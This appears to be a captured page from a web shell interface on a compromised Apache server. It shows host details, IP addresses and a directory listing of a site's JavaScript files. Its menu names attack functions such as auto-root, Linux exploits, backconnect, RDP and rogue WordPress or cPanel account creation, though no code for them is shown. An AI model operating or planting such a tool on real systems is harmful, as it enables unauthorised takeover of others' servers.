Linux server-604606.appsiete.com 3.10.0-1160.139.1.el7.tuxcare.els2.x86_64 #1 SMP Mon Nov 3 13:30:41 UTC 2025 x86_64
Apache
: 162.240.172.200 | : 216.73.216.32
14 Domain
7.3.33
gujo45me
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
gujo45me /
public_html /
demo2 /
public /
js /
nota /
[ HOME SHELL ]
Name
Size
Permission
Action
detalles.js
847
B
-rw-r--r--
listar_credito.js
295
B
-rw-r--r--
listar_debito.js
293
B
-rw-r--r--
nuevo_credito.js
1.22
KB
-rw-r--r--
nuevo_debito.js
1.43
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : listar_debito.js
$(function () { $('[name="estado_envio"]').change(function() { var option= $("option:selected", this).val(); if (option == "TODOS") { location.href = APP_URL+"/nota/listar_debito"; } else{ location.href = APP_URL+"/nota/estado_debito/"+option; } }); });
Close